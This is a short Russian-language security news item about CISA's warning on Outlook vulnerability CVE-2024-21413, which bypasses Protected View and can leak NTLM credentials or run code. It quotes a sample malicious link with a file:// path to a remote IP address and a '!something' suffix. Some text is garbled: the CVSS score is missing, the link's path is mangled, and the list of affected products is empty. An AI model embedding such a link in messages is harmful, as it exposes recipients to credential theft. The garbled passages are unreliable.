08.02.2025 | Восклицательный знак в Outlook стал инструментом взлома госучреждений |
Агентство CISA предупреждает о необходимости срочно закрыть критическую уязвимость в Microsoft Outlook , которая уже используется злоумышленниками. Предупреждение особенно касается федеральных агентств. Уязвимость CVE-2024-21413 позволяет выполнять произвольный код на удалённых системах, обходя защитные механизмы Outlook. Ошибка была обнаружена Check Point и связана с некорректной проверкой ввода при открытии писем с вредоносными ссылками в уязвимых версиях Outlook. Эксплуатация ошибки даёт злоумышленникам возможность обходить режим защищённого просмотра, предназначенный для блокировки опасного контента. В результате вредоносные файлы Office открываются в режиме редактирования, что позволяет загружать и выполнять вредоносный код. Microsoft исправила CVE-2024-21413 (оценка CVSS: в 2024 году, но предупредила, что уязвимость остаётся активной даже в режиме предварительного просмотра документов. В отчёте Check Point говорится, что злоумышленники используют обходной метод, добавляя в ссылки с протоколом <a href="file:///\10.10.111.111 est est.rtf!something">CLICK ME</a> Под угрозой находятся различные версии продуктов Microsoft:
Успешная эксплуатация уязвимости может привести к краже NTLM-учётных данных и выполнению произвольного кода. Федеральным агентствам необходимо устранить ошибку до 27 февраля в соответствии с директивой BOD 22-01. В CISA подчёркивают, что подобные уязвимости часто становятся целями хакеров и представляют серьёзную угрозу для государственной инфраструктуры. Хотя предписание касается госучреждений, специалисты настоятельно рекомендуют всем организациям срочно установить обновления безопасности, чтобы предотвратить возможные атаки. |
Проверить безопасность сайта